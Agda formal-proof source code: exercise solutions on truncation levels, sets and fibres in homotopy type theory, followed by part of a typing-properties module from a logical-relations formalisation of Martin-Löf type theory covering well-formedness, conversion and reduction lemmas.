8.3 abstract is-prop-Eq-𝟚 : (x y : bool) → is-prop (Eq-𝟚 x y) is-prop-Eq-𝟚 true true = is-prop-unit is-prop-Eq-𝟚 true false = is-prop-empty is-prop-Eq-𝟚 false true = is-prop-empty is-prop-Eq-𝟚 false false = is-prop-unit abstract eq-Eq-𝟚 : (x y : bool) → Eq-𝟚 x y → Id x y eq-Eq-𝟚 true true star = refl eq-Eq-𝟚 true false () eq-Eq-𝟚 false true () eq-Eq-𝟚 false false star = refl abstract is-set-bool : is-set bool is-set-bool = is-set-prop-in-id Eq-𝟚 is-prop-Eq-𝟚 reflexive-Eq-𝟚 eq-Eq-𝟚 set-bool : UU-Set lzero set-bool = pair bool is-set-bool -- Exercise 8.4 abstract is-trunc-succ-empty : (k : 𝕋) → is-trunc (succ-𝕋 k) empty is-trunc-succ-empty k = ind-empty abstract is-trunc-coprod : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → is-trunc (succ-𝕋 (succ-𝕋 k)) A → is-trunc (succ-𝕋 (succ-𝕋 k)) B → is-trunc (succ-𝕋 (succ-𝕋 k)) (coprod A B) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inl x) (inl y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inl x) (inl y)) ( Eq-coprod-eq A B (inl x) (inl y)) ( is-equiv-Eq-coprod-eq A B (inl x) (inl y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( Id x y) ( map-raise _ (Id x y)) ( is-equiv-map-raise _ (Id x y)) ( is-trunc-A x y)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inl x) (inr y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inl x) (inr y)) ( Eq-coprod-eq A B (inl x) (inr y)) ( is-equiv-Eq-coprod-eq A B (inl x) (inr y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( empty) ( map-raise _ empty) ( is-equiv-map-raise _ empty) ( is-trunc-succ-empty k)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inr x) (inl y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inr x) (inl y)) ( Eq-coprod-eq A B (inr x) (inl y)) ( is-equiv-Eq-coprod-eq A B (inr x) (inl y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( empty) ( map-raise _ empty) ( is-equiv-map-raise _ empty) ( is-trunc-succ-empty k)) is-trunc-coprod k {A} {B} is-trunc-A is-trunc-B (inr x) (inr y) = is-trunc-is-equiv (succ-𝕋 k) ( Eq-coprod A B (inr x) (inr y)) ( Eq-coprod-eq A B (inr x) (inr y)) ( is-equiv-Eq-coprod-eq A B (inr x) (inr y)) ( is-trunc-is-equiv' (succ-𝕋 k) ( Id x y) ( map-raise _ (Id x y)) ( is-equiv-map-raise _ (Id x y)) ( is-trunc-B x y)) abstract is-set-coprod : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-set A → is-set B → is-set (coprod A B) is-set-coprod = is-trunc-coprod neg-two-𝕋 set-coprod : {l1 l2 : Level} (A : UU-Set l1) (B : UU-Set l2) → UU-Set (l1 ⊔ l2) set-coprod (pair A is-set-A) (pair B is-set-B) = pair (coprod A B) (is-set-coprod is-set-A is-set-B) abstract is-set-unit : is-set unit is-set-unit = is-trunc-succ-is-trunc neg-one-𝕋 unit is-prop-unit set-unit : UU-Set lzero set-unit = pair unit is-set-unit abstract is-set-ℤ : is-set ℤ is-set-ℤ = is-set-coprod is-set-ℕ (is-set-coprod is-set-unit is-set-ℕ) set-ℤ : UU-Set lzero set-ℤ = pair ℤ is-set-ℤ is-set-empty : is-set empty is-set-empty () abstract is-set-Fin : (n : ℕ) → is-set (Fin n) is-set-Fin zero-ℕ = is-set-empty is-set-Fin (succ-ℕ n) = is-set-coprod (is-set-Fin n) is-set-unit set-Fin : (n : ℕ) → UU-Set lzero set-Fin n = pair (Fin n) (is-set-Fin n) -- Exercise 8.7 abstract is-trunc-retract-of : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} → A retract-of B → is-trunc k B → is-trunc k A is-trunc-retract-of neg-two-𝕋 (pair i (pair r H)) is-trunc-B = is-contr-retract-of _ (pair i (pair r H)) is-trunc-B is-trunc-retract-of (succ-𝕋 k) (pair i retr-i) is-trunc-B x y = is-trunc-retract-of k ( pair (ap i) (retr-ap i retr-i x y)) ( is-trunc-B (i x) (i y)) -- Exercise 8.8 is-injective : {l1 l2 : Level} {A : UU l1} (is-set-A : is-set A) {B : UU l2} (is-set-B : is-set B) (f : A → B) → UU (l1 ⊔ l2) is-injective {A = A} is-set-A is-set-B f = (x y : A) → Id (f x) (f y) → Id x y is-injective-const-true : is-injective is-set-unit is-set-bool (const unit bool true) is-injective-const-true x y p = center (is-prop-unit x y) is-injective-const-false : is-injective is-set-unit is-set-bool (const unit bool false) is-injective-const-false x y p = center (is-prop-unit x y) abstract is-equiv-is-prop : {l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → {f : A → B} → (B → A) → is-equiv f is-equiv-is-prop is-prop-A is-prop-B {f} g = is-equiv-has-inverse ( g) ( λ y → center (is-prop-B (f (g y)) y)) ( λ x → center (is-prop-A (g (f x)) x)) equiv-prop : { l1 l2 : Level} {A : UU l1} {B : UU l2} → is-prop A → is-prop B → ( A → B) → (B → A) → A ≃ B equiv-prop is-prop-A is-prop-B f g = pair f (is-equiv-is-prop is-prop-A is-prop-B g) equiv-total-subtype : { l1 l2 l3 : Level} {A : UU l1} {P : A → UU l2} {Q : A → UU l3} → ( is-subtype-P : is-subtype P) (is-subtype-Q : is-subtype Q) → ( f : (x : A) → P x → Q x) → ( g : (x : A) → Q x → P x) → ( Σ A P) ≃ (Σ A Q) equiv-total-subtype is-subtype-P is-subtype-Q f g = pair ( tot f) ( is-equiv-tot-is-fiberwise-equiv {f = f} ( λ x → is-equiv-is-prop (is-subtype-P x) (is-subtype-Q x) (g x))) abstract is-emb-is-injective : {l1 l2 : Level} {A : UU l1} (is-set-A : is-set A) {B : UU l2} (is-set-B : is-set B) (f : A → B) → is-injective is-set-A is-set-B f → is-emb f is-emb-is-injective is-set-A is-set-B f is-injective-f x y = is-equiv-is-prop ( is-set-A x y) ( is-set-B (f x) (f y)) ( is-injective-f x y) abstract is-injective-is-emb : {l1 l2 : Level} {A : UU l1} {is-set-A : is-set A} {B : UU l2} {is-set-B : is-set B} {f : A → B} → is-emb f → is-injective is-set-A is-set-B f is-injective-is-emb is-emb-f x y = inv-is-equiv (is-emb-f x y) -- Exercise 8.9 abstract is-trunc-const-is-trunc : {l : Level} (k : 𝕋) {A : UU l} → is-trunc (succ-𝕋 k) A → (x : A) → is-trunc-map k (const unit A x) is-trunc-const-is-trunc k is-trunc-A x y = is-trunc-is-equiv' k ( Id x y) ( left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-equiv-left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-trunc-A x y) abstract is-trunc-is-trunc-const : {l : Level} (k : 𝕋) {A : UU l} → ((x : A) → is-trunc-map k (const unit A x)) → is-trunc (succ-𝕋 k) A is-trunc-is-trunc-const k is-trunc-const x y = is-trunc-is-equiv k ( Σ unit (λ t → Id x y)) ( left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-equiv-left-unit-law-Σ-map (λ t → Id x y) is-contr-unit) ( is-trunc-const x y) -- Exercise 8.10 map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → fib (g ∘ h) x → Σ (fib g x) (λ t → fib h (pr1 t)) map-fib-comp g h x (pair a p) = pair ( pair (h a) p) ( pair a refl) inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → Σ (fib g x) (λ t → fib h (pr1 t)) → fib (g ∘ h) x inv-map-fib-comp g h c t = pair (pr1 (pr2 t)) ((ap g (pr2 (pr2 t))) ∙ (pr2 (pr1 t))) issec-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) → (x : X) → ((map-fib-comp g h x) ∘ (inv-map-fib-comp g h x)) ~ id issec-inv-map-fib-comp g h x (pair (pair .(h a) refl) (pair a refl)) = refl isretr-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → ((inv-map-fib-comp g h x) ∘ (map-fib-comp g h x)) ~ id isretr-inv-map-fib-comp g h .(g (h a)) (pair a refl) = refl abstract is-equiv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → is-equiv (map-fib-comp g h x) is-equiv-map-fib-comp g h x = is-equiv-has-inverse ( inv-map-fib-comp g h x) ( issec-inv-map-fib-comp g h x) ( isretr-inv-map-fib-comp g h x) abstract is-equiv-inv-map-fib-comp : {l1 l2 l3 : Level} {A : UU l1} {B : UU l2} {X : UU l3} (g : B → X) (h : A → B) (x : X) → is-equiv (inv-map-fib-comp g h x) is-equiv-inv-map-fib-comp g h x = is-equiv-has-inverse ( map-fib-comp g h x) ( isretr-inv-map-fib-comp g h x) ( issec-inv-map-fib-comp g h x) abstract is-trunc-map-htpy : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} (f g : A → B) → f ~ g → is-trunc-map k g → is-trunc-map k f is-trunc-map-htpy k {A} f g H is-trunc-g b = is-trunc-is-equiv k ( Σ A (λ z → Id (g z) b)) ( fib-triangle f g id H b) ( is-fiberwise-equiv-is-equiv-triangle f g id H (is-equiv-id _) b) ( is-trunc-g b) abstract is-trunc-map-comp : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {X : UU l3} (f : A → X) (g : B → X) (h : A → B) (H : f ~ (g ∘ h)) → is-trunc-map k g → is-trunc-map k h → is-trunc-map k f is-trunc-map-comp k f g h H is-trunc-g is-trunc-h = is-trunc-map-htpy k f (g ∘ h) H ( λ x → is-trunc-is-equiv k ( Σ (fib g x) (λ t → fib h (pr1 t))) ( map-fib-comp g h x) ( is-equiv-map-fib-comp g h x) ( is-trunc-Σ k ( is-trunc-g x) ( λ t → is-trunc-h (pr1 t)))) abstract is-trunc-map-right-factor : {l1 l2 l3 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} {X : UU l3} (f : A → X) (g : B → X) (h : A → B) (H : f ~ (g ∘ h)) → is-trunc-map k g → is-trunc-map k f → is-trunc-map k h is-trunc-map-right-factor k {A} f g h H is-trunc-g is-trunc-f b = is-trunc-fam-is-trunc-Σ k ( is-trunc-g (g b)) ( is-trunc-is-equiv' k ( Σ A (λ z → Id (g (h z)) (g b))) ( map-fib-comp g h (g b)) ( is-equiv-map-fib-comp g h (g b)) ( is-trunc-map-htpy k (g ∘ h) f (htpy-inv H) is-trunc-f (g b))) ( pair b refl) abstract is-trunc-map-succ-is-trunc-map : {l1 l2 : Level} (k : 𝕋) {A : UU l1} {B : UU l2} (f : A → B) → is-trunc-map k f → is-trunc-map (succ-𝕋 k) f is-trunc-map-succ-is-trunc-map k f is-trunc-f b = is-trunc-succ-is-trunc k (fib f b) (is-trunc-f b)

Definition/Typed/Properties.agda

CoqHott/logrel-mltt

2

11902

{-# OPTIONS --safe #-} module Definition.Typed.Properties where open import Definition.Untyped open import Definition.Untyped.Properties open import Definition.Typed open import Definition.Typed.RedSteps import Definition.Typed.Weakening as Twk open import Tools.Empty using (⊥; ⊥-elim) open import Tools.Product open import Tools.Sum hiding (id ; sym) import Tools.PropositionalEquality as PE import Data.Fin as Fin import Data.Nat as Nat -- Escape context extraction wfTerm : ∀ {Γ A t r} → Γ ⊢ t ∷ A ^ r → ⊢ Γ wfTerm (univ <l ⊢Γ) = ⊢Γ wfTerm (ℕⱼ ⊢Γ) = ⊢Γ wfTerm (Emptyⱼ ⊢Γ) = ⊢Γ wfTerm (Πⱼ <l ▹ <l' ▹ F ▹ G) = wfTerm F wfTerm (∃ⱼ F ▹ G) = wfTerm F wfTerm (var ⊢Γ x₁) = ⊢Γ wfTerm (lamⱼ _ _ F t) with wfTerm t wfTerm (lamⱼ _ _ F t) | ⊢Γ ∙ F′ = ⊢Γ wfTerm (g ∘ⱼ a) = wfTerm a wfTerm (⦅ F , G , t , u ⦆ⱼ) = wfTerm t wfTerm (fstⱼ A B t) = wfTerm t wfTerm (sndⱼ A B t) = wfTerm t wfTerm (zeroⱼ ⊢Γ) = ⊢Γ wfTerm (sucⱼ n) = wfTerm n wfTerm (natrecⱼ F z s n) = wfTerm z wfTerm (Emptyrecⱼ A e) = wfTerm e wfTerm (Idⱼ A t u) = wfTerm t wfTerm (Idreflⱼ t) = wfTerm t wfTerm (transpⱼ A P t s u e) = wfTerm t wfTerm (castⱼ A B e t) = wfTerm t wfTerm (castreflⱼ A t) = wfTerm t wfTerm (conv t A≡B) = wfTerm t wf : ∀ {Γ A r} → Γ ⊢ A ^ r → ⊢ Γ wf (Uⱼ ⊢Γ) = ⊢Γ wf (univ A) = wfTerm A mutual wfEqTerm : ∀ {Γ A t u r} → Γ ⊢ t ≡ u ∷ A ^ r → ⊢ Γ wfEqTerm (refl t) = wfTerm t wfEqTerm (sym t≡u) = wfEqTerm t≡u wfEqTerm (trans t≡u u≡r) = wfEqTerm t≡u wfEqTerm (conv t≡u A≡B) = wfEqTerm t≡u wfEqTerm (Π-cong _ _ F F≡H G≡E) = wfEqTerm F≡H wfEqTerm (∃-cong F F≡H G≡E) = wfEqTerm F≡H wfEqTerm (app-cong f≡g a≡b) = wfEqTerm f≡g wfEqTerm (β-red _ _ F t a) = wfTerm a wfEqTerm (η-eq _ _ F f g f0≡g0) = wfTerm f wfEqTerm (suc-cong n) = wfEqTerm n wfEqTerm (natrec-cong F≡F′ z≡z′ s≡s′ n≡n′) = wfEqTerm z≡z′ wfEqTerm (natrec-zero F z s) = wfTerm z wfEqTerm (natrec-suc n F z s) = wfTerm n wfEqTerm (Emptyrec-cong A≡A' _ _) = wfEq A≡A' wfEqTerm (proof-irrelevance t u) = wfTerm t wfEqTerm (Id-cong A t u) = wfEqTerm u wfEqTerm (Id-Π _ _ A B t u) = wfTerm t wfEqTerm (Id-ℕ-00 ⊢Γ) = ⊢Γ wfEqTerm (Id-ℕ-SS m n) = wfTerm n wfEqTerm (Id-U-ΠΠ A B A' B') = wfTerm A wfEqTerm (Id-U-ℕℕ ⊢Γ) = ⊢Γ wfEqTerm (Id-SProp A B) = wfTerm A wfEqTerm (Id-ℕ-0S n) = wfTerm n wfEqTerm (Id-ℕ-S0 n) = wfTerm n wfEqTerm (Id-U-ℕΠ A B) = wfTerm A wfEqTerm (Id-U-Πℕ A B) = wfTerm A wfEqTerm (Id-U-ΠΠ!% eq A B A' B') = wfTerm A wfEqTerm (cast-cong A B t _ _) = wfEqTerm t wfEqTerm (cast-Π A B A' B' e f) = wfTerm f wfEqTerm (cast-ℕ-0 e) = wfTerm e wfEqTerm (cast-ℕ-S e n) = wfTerm n wfEq : ∀ {Γ A B r} → Γ ⊢ A ≡ B ^ r → ⊢ Γ wfEq (univ A≡B) = wfEqTerm A≡B wfEq (refl A) = wf A wfEq (sym A≡B) = wfEq A≡B wfEq (trans A≡B B≡C) = wfEq A≡B -- Reduction is a subset of conversion subsetTerm : ∀ {Γ A t u l} → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ≡ u ∷ A ^ [ ! , l ] subset : ∀ {Γ A B r} → Γ ⊢ A ⇒ B ^ r → Γ ⊢ A ≡ B ^ r subsetTerm (natrec-subst F z s n⇒n′) = natrec-cong (refl F) (refl z) (refl s) (subsetTerm n⇒n′) subsetTerm (natrec-zero F z s) = natrec-zero F z s subsetTerm (natrec-suc n F z s) = natrec-suc n F z s subsetTerm (app-subst {rA = !} t⇒u a) = app-cong (subsetTerm t⇒u) (refl a) subsetTerm (app-subst {rA = %} t⇒u a) = app-cong (subsetTerm t⇒u) (proof-irrelevance a a) subsetTerm (β-red l< l<' A t a) = β-red l< l<' A t a subsetTerm (conv t⇒u A≡B) = conv (subsetTerm t⇒u) A≡B subsetTerm (Id-subst A t u) = Id-cong (subsetTerm A) (refl t) (refl u) subsetTerm (Id-ℕ-subst m n) = Id-cong (refl (ℕⱼ (wfTerm n))) (subsetTerm m) (refl n) subsetTerm (Id-ℕ-0-subst n) = let ⊢Γ = wfEqTerm (subsetTerm n) in Id-cong (refl (ℕⱼ ⊢Γ)) (refl (zeroⱼ ⊢Γ)) (subsetTerm n) subsetTerm (Id-ℕ-S-subst m n) = Id-cong (refl (ℕⱼ (wfTerm m))) (refl (sucⱼ m)) (subsetTerm n) subsetTerm (Id-U-subst A B) = Id-cong (refl (univ 0<1 (wfTerm B))) (subsetTerm A) (refl B) subsetTerm (Id-U-ℕ-subst B) = let ⊢Γ = wfEqTerm (subsetTerm B) in Id-cong (refl (univ 0<1 ⊢Γ)) (refl (ℕⱼ ⊢Γ)) (subsetTerm B) subsetTerm (Id-U-Π-subst A P B) = Id-cong (refl (univ 0<1 (wfTerm A))) (refl (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P)) (subsetTerm B) subsetTerm (Id-Π <l <l' A B t u) = Id-Π <l <l' A B t u subsetTerm (Id-ℕ-00 ⊢Γ) = Id-ℕ-00 ⊢Γ subsetTerm (Id-ℕ-SS m n) = Id-ℕ-SS m n subsetTerm (Id-U-ΠΠ A B A' B') = Id-U-ΠΠ A B A' B' subsetTerm (Id-U-ℕℕ ⊢Γ) = Id-U-ℕℕ ⊢Γ subsetTerm (Id-SProp A B) = Id-SProp A B subsetTerm (Id-ℕ-0S n) = Id-ℕ-0S n subsetTerm (Id-ℕ-S0 n) = Id-ℕ-S0 n subsetTerm (Id-U-ℕΠ A B) = Id-U-ℕΠ A B subsetTerm (Id-U-Πℕ A B) = Id-U-Πℕ A B subsetTerm (Id-U-ΠΠ!% eq A B A' B') = Id-U-ΠΠ!% eq A B A' B' subsetTerm (cast-subst A B e t) = let ⊢Γ = wfEqTerm (subsetTerm A) in cast-cong (subsetTerm A) (refl B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (subsetTerm A) (refl B)))) subsetTerm (cast-ℕ-subst B e t) = let ⊢Γ = wfEqTerm (subsetTerm B) in cast-cong (refl (ℕⱼ (wfTerm t))) (subsetTerm B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (refl (ℕⱼ ⊢Γ)) (subsetTerm B)))) subsetTerm (cast-Π-subst A P B e t) = let ⊢Γ = wfTerm A in cast-cong (refl (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P)) (subsetTerm B) (refl t) e (conv e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (refl (Πⱼ ≡is≤ PE.refl ▹ ≡is≤ PE.refl ▹ A ▹ P)) (subsetTerm B) ))) subsetTerm (cast-Π A B A' B' e f) = cast-Π A B A' B' e f subsetTerm (cast-ℕ-0 e) = cast-ℕ-0 e subsetTerm (cast-ℕ-S e n) = cast-ℕ-S e n subsetTerm (cast-ℕ-cong e n) = let ⊢Γ = wfTerm e ⊢ℕ = ℕⱼ ⊢Γ in cast-cong (refl ⊢ℕ) (refl ⊢ℕ) (subsetTerm n) e e subset (univ A⇒B) = univ (subsetTerm A⇒B) subset*Term : ∀ {Γ A t u l } → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ t ≡ u ∷ A ^ [ ! , l ] subset*Term (id t) = refl t subset*Term (t⇒t′ ⇨ t⇒*u) = trans (subsetTerm t⇒t′) (subset*Term t⇒*u) subset* : ∀ {Γ A B r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ A ≡ B ^ r subset* (id A) = refl A subset* (A⇒A′ ⇨ A′⇒*B) = trans (subset A⇒A′) (subset* A′⇒*B) -- Transitivity of reduction transTerm⇒* : ∀ {Γ A t u v l } → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ u ⇒* v ∷ A ^ l → Γ ⊢ t ⇒* v ∷ A ^ l transTerm⇒* (id x) y = y transTerm⇒* (x ⇨ x₁) y = x ⇨ transTerm⇒* x₁ y trans⇒* : ∀ {Γ A B C r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ B ⇒* C ^ r → Γ ⊢ A ⇒* C ^ r trans⇒* (id x) y = y trans⇒* (x ⇨ x₁) y = x ⇨ trans⇒* x₁ y transTerm:⇒:* : ∀ {Γ A t u v l } → Γ ⊢ t :⇒*: u ∷ A ^ l → Γ ⊢ u :⇒*: v ∷ A ^ l → Γ ⊢ t :⇒*: v ∷ A ^ l transTerm:⇒:* [[ ⊢t , ⊢u , d ]] [[ ⊢t₁ , ⊢u₁ , d₁ ]] = [[ ⊢t , ⊢u₁ , (transTerm⇒* d d₁) ]] conv⇒* : ∀ {Γ A B l t u} → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ A ≡ B ^ [ ! , l ] → Γ ⊢ t ⇒* u ∷ B ^ l conv⇒* (id x) e = id (conv x e) conv⇒* (x ⇨ D) e = conv x e ⇨ conv⇒* D e conv:⇒*: : ∀ {Γ A B l t u} → Γ ⊢ t :⇒*: u ∷ A ^ l → Γ ⊢ A ≡ B ^ [ ! , l ] → Γ ⊢ t :⇒*: u ∷ B ^ l conv:⇒*: [[ ⊢t , ⊢u , d ]] e = [[ (conv ⊢t e) , (conv ⊢u e) , (conv⇒* d e) ]] -- Can extract left-part of a reduction redFirstTerm : ∀ {Γ t u A l } → Γ ⊢ t ⇒ u ∷ A ^ l → Γ ⊢ t ∷ A ^ [ ! , l ] redFirst : ∀ {Γ A B r} → Γ ⊢ A ⇒ B ^ r → Γ ⊢ A ^ r redFirstTerm (conv t⇒u A≡B) = conv (redFirstTerm t⇒u) A≡B redFirstTerm (app-subst t⇒u a) = (redFirstTerm t⇒u) ∘ⱼ a redFirstTerm (β-red {lA = lA} {lB = lB} lA< lB< ⊢A ⊢t ⊢a) = (lamⱼ lA< lB< ⊢A ⊢t) ∘ⱼ ⊢a redFirstTerm (natrec-subst F z s n⇒n′) = natrecⱼ F z s (redFirstTerm n⇒n′) redFirstTerm (natrec-zero F z s) = natrecⱼ F z s (zeroⱼ (wfTerm z)) redFirstTerm (natrec-suc n F z s) = natrecⱼ F z s (sucⱼ n) redFirstTerm (Id-subst A t u) = Idⱼ (redFirstTerm A) t u redFirstTerm (Id-ℕ-subst m n) = Idⱼ (ℕⱼ (wfTerm n)) (redFirstTerm m) n redFirstTerm (Id-ℕ-0-subst n) = Idⱼ (ℕⱼ (wfEqTerm (subsetTerm n))) (zeroⱼ (wfEqTerm (subsetTerm n))) (redFirstTerm n) redFirstTerm (Id-ℕ-S-subst m n) = Idⱼ (ℕⱼ (wfTerm m)) (sucⱼ m) (redFirstTerm n) redFirstTerm (Id-U-subst A B) = Idⱼ (univ 0<1 (wfTerm B)) (redFirstTerm A) B redFirstTerm (Id-U-ℕ-subst B) = let ⊢Γ = (wfEqTerm (subsetTerm B)) in Idⱼ (univ 0<1 ⊢Γ) (ℕⱼ ⊢Γ) (redFirstTerm B) redFirstTerm (Id-U-Π-subst A P B) = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P) (redFirstTerm B) redFirstTerm (Id-Π {rA = rA} <l <l' A B t u) = Idⱼ (Πⱼ <l ▹ <l' ▹ A ▹ B) t u redFirstTerm (Id-ℕ-00 ⊢Γ) = Idⱼ (ℕⱼ ⊢Γ) (zeroⱼ ⊢Γ) (zeroⱼ ⊢Γ) redFirstTerm (Id-ℕ-SS m n) = Idⱼ (ℕⱼ (wfTerm m)) (sucⱼ m) (sucⱼ n) redFirstTerm (Id-U-ΠΠ A B A' B') = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') redFirstTerm (Id-U-ℕℕ ⊢Γ) = Idⱼ (univ 0<1 ⊢Γ) (ℕⱼ ⊢Γ) (ℕⱼ ⊢Γ) redFirstTerm (Id-SProp A B) = Idⱼ (univ 0<1 (wfTerm A)) A B redFirstTerm (Id-ℕ-0S n) = Idⱼ (ℕⱼ (wfTerm n)) (zeroⱼ (wfTerm n)) (sucⱼ n) redFirstTerm (Id-ℕ-S0 n) = Idⱼ (ℕⱼ (wfTerm n)) (sucⱼ n) (zeroⱼ (wfTerm n)) redFirstTerm (Id-U-ℕΠ A B) = Idⱼ (univ 0<1 (wfTerm A)) (ℕⱼ (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) redFirstTerm (Id-U-Πℕ A B) = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (ℕⱼ (wfTerm A)) redFirstTerm (Id-U-ΠΠ!% eq A B A' B') = Idⱼ (univ 0<1 (wfTerm A)) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') redFirstTerm (cast-subst A B e t) = castⱼ (redFirstTerm A) B e t redFirstTerm (cast-ℕ-subst B e t) = castⱼ (ℕⱼ (wfTerm t)) (redFirstTerm B) e t redFirstTerm (cast-Π-subst A P B e t) = castⱼ (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ P) (redFirstTerm B) e t redFirstTerm (cast-Π A B A' B' e f) = castⱼ (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A ▹ B) (Πⱼ (≡is≤ PE.refl) ▹ (≡is≤ PE.refl) ▹ A' ▹ B') e f redFirstTerm (cast-ℕ-0 e) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (zeroⱼ (wfTerm e)) redFirstTerm (cast-ℕ-S e n) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (sucⱼ n) redFirstTerm (cast-ℕ-cong e n) = castⱼ (ℕⱼ (wfTerm e)) (ℕⱼ (wfTerm e)) e (redFirstTerm n) redFirst (univ A⇒B) = univ (redFirstTerm A⇒B) redFirst*Term : ∀ {Γ t u A l} → Γ ⊢ t ⇒* u ∷ A ^ l → Γ ⊢ t ∷ A ^ [ ! , l ] redFirst*Term (id t) = t redFirst*Term (t⇒t′ ⇨ t′⇒*u) = redFirstTerm t⇒t′ redFirst* : ∀ {Γ A B r} → Γ ⊢ A ⇒* B ^ r → Γ ⊢ A ^ r redFirst* (id A) = A redFirst* (A⇒A′ ⇨ A′⇒*B) = redFirst A⇒A′ -- Neutral types are always small -- tyNe : ∀ {Γ t r} → Γ ⊢ t ^ r → Neutral t → Γ ⊢ t ∷ (Univ r) ^ ! -- tyNe (univ x) tn = x -- tyNe (Idⱼ A x y) tn = Idⱼ A x y -- Neutrals do not weak head reduce neRedTerm : ∀ {Γ t u l A} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (n : Neutral t) → ⊥ neRed : ∀ {Γ t u r} (d : Γ ⊢ t ⇒ u ^ r) (n : Neutral t) → ⊥ whnfRedTerm : ∀ {Γ t u A l} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (w : Whnf t) → ⊥ whnfRed : ∀ {Γ A B r} (d : Γ ⊢ A ⇒ B ^ r) (w : Whnf A) → ⊥ neRedTerm (conv d x) n = neRedTerm d n neRedTerm (app-subst d x) (∘ₙ n) = neRedTerm d n neRedTerm (β-red _ _ x x₁ x₂) (∘ₙ ()) neRedTerm (natrec-zero x x₁ x₂) (natrecₙ ()) neRedTerm (natrec-suc x x₁ x₂ x₃) (natrecₙ ()) neRedTerm (natrec-subst x x₁ x₂ tr) (natrecₙ tn) = neRedTerm tr tn neRedTerm (Id-subst tr x y) (Idₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-subst tr x) (Idℕₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-0-subst tr) (Idℕ0ₙ tn) = neRedTerm tr tn neRedTerm (Id-ℕ-S-subst x tr) (IdℕSₙ tn) = neRedTerm tr tn neRedTerm (Id-U-subst tr x) (IdUₙ tn) = neRedTerm tr tn neRedTerm (Id-U-ℕ-subst tr) (IdUℕₙ tn) = neRedTerm tr tn neRedTerm (Id-U-Π-subst A B tr) (IdUΠₙ tn) = neRedTerm tr tn neRedTerm (Id-subst tr x y) (Idℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (Idℕ0ₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (IdℕSₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-subst tr x y) (IdUₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-subst tr x y) (IdUℕₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-subst tr x y) (IdUΠₙ tn) = whnfRedTerm tr Uₙ neRedTerm (Id-ℕ-subst tr x) (Idℕ0ₙ tn) = whnfRedTerm tr zeroₙ neRedTerm (Id-ℕ-subst tr x) (IdℕSₙ tn) = whnfRedTerm tr sucₙ neRedTerm (Id-U-subst tr x) (IdUℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (Id-U-subst tr x) (IdUΠₙ tn) = whnfRedTerm tr Πₙ neRedTerm (Id-Π _ _ A B t u) (Idₙ ()) neRedTerm 